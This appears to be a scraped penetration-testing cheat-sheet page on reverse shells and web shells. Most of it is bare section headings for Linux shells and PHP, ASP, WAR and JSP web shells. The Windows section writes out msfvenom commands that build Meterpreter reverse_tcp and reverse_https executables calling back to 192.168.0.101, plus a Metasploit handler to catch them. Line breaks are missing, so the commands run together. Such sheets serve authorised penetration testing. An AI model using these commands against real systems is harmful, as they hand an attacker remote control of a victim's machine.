Shell
Reverse-shells
Msfvenom
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=445 -f exe -o shell_reverse.exeuse exploit/multi/handler
set payload windows/meterpreter/reverse_tcpmsfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.101 LPORT=443 -f exe -o met_https_reverse.exeInject payload into binary
Linux
Binary
Bash
Php
Netcat
Ncat
Telnet
Perl
Ruby
Java
Python
Web-shells - Platform Independent
PHP
ASP
WAR
JSP
Last updated